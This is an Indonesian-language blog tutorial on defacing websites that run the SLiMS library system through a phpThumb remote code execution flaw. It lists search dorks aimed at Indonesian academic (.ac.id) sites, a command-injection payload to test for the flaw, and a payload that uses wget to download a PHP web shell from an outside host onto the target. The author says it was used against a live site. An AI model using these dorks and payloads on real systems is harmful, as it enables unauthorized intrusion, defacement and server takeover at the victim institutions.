Deface Metode Slims Remote Code Execution (RCE)
oghey geng kali ini di blog skullxploit. Akan kasih tutorial cara deface poc slims rce
BahanBahan :
# Dork
inurl:/index.php?p=show_detail&id= site:ac.id inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id "Powered By SliMS7" cendana inurl:"/index.php?select_lang=" site:.
[ pokokny kembangin sndiri pke otak wibu kelen :v ]
Payload untuk mengecek Vuln atau engga nya
lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;%20&phpThumbDebug=9
Payload Rce buat upload shell nya
lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/Anon-Exploiter/Mini-Shell/master/mini_shell.php;%20&phpThumbDebug=9
Step.1
dorking dulu ya pke dork yg di atas
Step.2
nah kebetulan w sudah ada live target nya
Step.3
langsung aja gw ksih payload yg buat tes Vuln atau engga ny
oke kalau gini kemungkinan Vuln ya :v
Step.4
Langsung saja gw ksih Payload rce nya buat upshell
oke done berhasil ke upload sekian dari blog skullxploit